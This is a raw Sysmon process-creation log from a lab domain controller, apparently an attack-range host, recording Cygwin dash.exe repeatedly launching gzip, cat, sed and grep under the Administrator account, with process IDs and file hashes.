14:55:54.751{A8622C2F-53FA-6078-8C08-00000000AE01}6748C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-8A08-00000000AE01}1628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.751{A8622C2F-53FA-6078-8B08-00000000AE01}3220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047123Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.744{A8622C2F-53FA-6078-8A08-00000000AE01}1628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047111Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.736{A8622C2F-53FA-6078-8908-00000000AE01}5828C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-8808-00000000AE01}5108C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047100Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.729{A8622C2F-53FA-6078-8808-00000000AE01}5108C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047088Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.720{A8622C2F-53FA-6078-8708-00000000AE01}7140C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-8508-00000000AE01}4832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047071Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.713{A8622C2F-53FA-6078-8608-00000000AE01}6064C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-8308-00000000AE01}4476C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047068Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.713{A8622C2F-53FA-6078-8508-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047050Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.706{A8622C2F-53FA-6078-8408-00000000AE01}3008C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-8208-00000000AE01}6332C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047048Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.706{A8622C2F-53FA-6078-8308-00000000AE01}4476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047035Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.698{A8622C2F-53FA-6078-8208-00000000AE01}6332C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047023Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.690{A8622C2F-53FA-6078-8108-00000000AE01}5144C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-8008-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047013Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.683{A8622C2F-53FA-6078-8008-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000047001Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.675{A8622C2F-53FA-6078-7F08-00000000AE01}4604C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-7D08-00000000AE01}6084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046983Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.667{A8622C2F-53FA-6078-7E08-00000000AE01}5184C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-7B08-00000000AE01}1612C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046981Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.667{A8622C2F-53FA-6078-7D08-00000000AE01}6084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046963Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.660{A8622C2F-53FA-6078-7C08-00000000AE01}6240C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-7A08-00000000AE01}6336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046961Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.659{A8622C2F-53FA-6078-7B08-00000000AE01}1612C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046948Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.652{A8622C2F-53FA-6078-7A08-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046936Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.644{A8622C2F-53FA-6078-7908-00000000AE01}5344C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-7808-00000000AE01}6672C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046926Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.637{A8622C2F-53FA-6078-7808-00000000AE01}6672C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046914Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.628{A8622C2F-53FA-6078-7708-00000000AE01}1800C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-7508-00000000AE01}5312C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046897Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.621{A8622C2F-53FA-6078-7608-00000000AE01}5828C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-7308-00000000AE01}5108C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046894Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.621{A8622C2F-53FA-6078-7508-00000000AE01}5312C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046875Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.614{A8622C2F-53FA-6078-7408-00000000AE01}5404C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-7208-00000000AE01}7140C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046874Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.614{A8622C2F-53FA-6078-7308-00000000AE01}5108C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046862Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.607{A8622C2F-53FA-6078-7208-00000000AE01}7140C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046849Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.599{A8622C2F-53FA-6078-7108-00000000AE01}5852C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-7008-00000000AE01}5628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046839Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.592{A8622C2F-53FA-6078-7008-00000000AE01}5628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046827Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.583{A8622C2F-53FA-6078-6F08-00000000AE01}6440C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-6D08-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046809Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.576{A8622C2F-53FA-6078-6E08-00000000AE01}5640C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-6B08-00000000AE01}1496C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046807Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.576{A8622C2F-53FA-6078-6D08-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046789Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.568{A8622C2F-53FA-6078-6C08-00000000AE01}4788C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-6A08-00000000AE01}616C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046787Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.568{A8622C2F-53FA-6078-6B08-00000000AE01}1496C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046775Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.561{A8622C2F-53FA-6078-6A08-00000000AE01}616C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046762Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.552{A8622C2F-53FA-6078-6908-00000000AE01}4160C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FA-6078-6808-00000000AE01}6456C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046752Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.545{A8622C2F-53FA-6078-6808-00000000AE01}6456C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046740Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.536{A8622C2F-53FA-6078-6708-00000000AE01}4336C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FA-6078-6508-00000000AE01}6336C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046720Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.529{A8622C2F-53FA-6078-6608-00000000AE01}3912C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FA-6078-6308-00000000AE01}1628C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046719Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.528{A8622C2F-53FA-6078-6508-00000000AE01}6336C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046700Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:54.521{A8622C2F-53FA-6078-6408-00000000AE01}1800C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FA-6078-6208-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046699Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:54.521{A8622C2F-53FA-6078-6308-00000000AE01}1628C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000046687Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 